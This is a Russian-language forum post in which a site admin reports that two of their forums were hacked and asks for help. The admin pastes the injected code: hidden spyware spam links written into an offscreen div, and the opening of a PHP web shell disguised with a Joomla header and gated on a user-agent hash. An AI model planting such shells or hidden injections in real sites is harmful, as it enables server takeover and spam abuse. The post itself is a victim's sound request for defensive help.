Взлом форума

[alexwin]

Добрый день!
Сегодня ночью форум стал выдавать ошибку в строке номер N файла source/Errors.php

Полез смотреть, а там вот:

Код Выделить Развернуть

<script type="text/javascript">
document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1912px; t' + 'op' + ': -2882px;">');
</script>

<a href="http://мойфорум/avatars/index.html">como espiar facebook en android</a>
<a href="http://мойфорум/avatars/numero/index.html">android paquete rastreador movil</a>
<a href="http://мойфорум/avatars/app-for-tracking/index.html">como quitar la propaganda de espia celular</a>
<a href="http://мойфорум/avatars/whatsapp-espiar-online/index.html">link</a>
<a href="http://мойфорум/avatars/celular-locator/index.html">espiar sms de celulares</a>
<a href="http://мойфорум/avatars/como-persona/index.html">press</a>
<a href="http://мойфорум/avatars/espia-tracker/index.html">descargar aplicacion de espiar whatsapp</a>
<a href="http://мойфорум/avatars/numnero/index.html">app para espiar celulares gratis</a>
<a href="http://мойфорум/avatars/sms-kid/index.html">eliminar programa espia movil</a>
<a href="http://мойфорум/avatars/espia-software/index.html">no hay programas de espia gratis de verdad</a>
<a href="http://мойфорум/avatars/spying-on-iphone/index.html">programa espia para ipad</a>
<a href="http://мойфорум/avatars/aplicatii-spy-phone/index.html">apk para espiar otros dispositivos android</a>
<a href="http://мойфорум/avatars/cheating-boyfriend/index.html">aparatos</a>
<a href="http://мойфорум/avatars/mobile-espia/index.html">donde puedo descargar whatsapp spy para blackberry</a>
<a href="http://мойфорум/avatars/app-pista-celular/index.html">press</a>
<a href="http://мойфорум/avatars/software-espia/index.html">rastrear un numero de telefono</a>
<a href="http://мойфорум/avatars/robado/index.html">eliminar sofware espia gratis</a>
<a href="http://мойфорум/avatars/espia-on-spouse/index.html">programas para espiar contraseas gratis</a>
<a href="http://мойфорум/avatars/sms-location/index.html">press</a>
<a href="http://мойфорум/avatars/perdido/index.html">spy on blackberry messenger</a>
<a href="http://мойфорум/avatars/espia-on-boyfriend/index.html">programa que espia mi pc</a>
<a href="http://мойфорум/avatars/android-best-spy/index.html">programa espia mail</a>
<a href="http://мойфорум/avatars/programa/index.html">site</a>
<a href="http://мойфорум/avatars/rastrear-general/index.html">descargar spy</a>
<a href="http://мойфорум/avatars/sms-espia/index.html">programas para espiar otra pc desde la mia</a>
<a href="http://мойфорум/avatars/como-gps/index.html">spy mobil get sms</a>
<a href="http://southcarolinaautoglass.com/wp-content/index.html">software espia</a>
<a href="http://goutchoices.com/templates/index.html">como quitar</a>
<a href="http://ejcuisine.ma/themes/index.html">link</a>
<a href="http://ww.ww.lkhzone.pl/includes/index.html">descargar guy spy</a>
<a href="http://aktionen.medea.at/joomla/language/index.html">espiar celular foro</a>
<a href="http://kaz.bobek.kz/misc/index.html">espia mensajes de texto o sms de celulares cualquier modelo</a>
<a href="http://kremnaronblog.ru">Натруальный крем на травах для женщин</a>


<script type="text/javascript">document.write('</d' + 'iv>');</script>


В папке avatars соответственно все эти страницы залиты + какой-то functionst3fz9g.php с кодом:

Код Выделить Развернуть

<?php
/**
 * [at]package Joomla.Site
 * [at]subpackage mod_custom
 * [at]copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * [at]license GNU General Public License version 2 or later; see LICENSE.txt
 */

if ( md5(getenv('HTTP_USER_AGENT')) != '69bc3b342502573e6d727f341674f010') 
header('Location: ' . 'http://' . $_SERVER['HTTP_HOST'] );
$default_action = 'FilesWin';
[at]define('SELF_PATH', __FILE__);
[at]session_start();
[at]ini_set('max_execution_time',0);
[at]set_magic_quotes_runtime(0);
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
$home_cwd = [at]getcwd();
if( isset( $_POST['c'] ) )
[at]chdir($_POST['c']);
$cwd = [at]getcwd();
if( $os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';


И ЕЩЕ ОКОЛО 500 СТРОК КОДА




+ sitemap.html
+ sploit.tgz



Это произошло у меня на 2-х форумах с разницей по времени в пару дней.
Версия форума последняя (2.0.10)
Тема оформления на одном стандартная, на другом от DzinerStudio

Как от этого защититься в будущем?
В чем может быть проблема? У кого-нибудь есть такое?

У меня несколько форумов на разных хостингах.
Такое вылезло только на двух (они оба на выделенном сервере,)
Можно сделать предположение, что проблема в нем.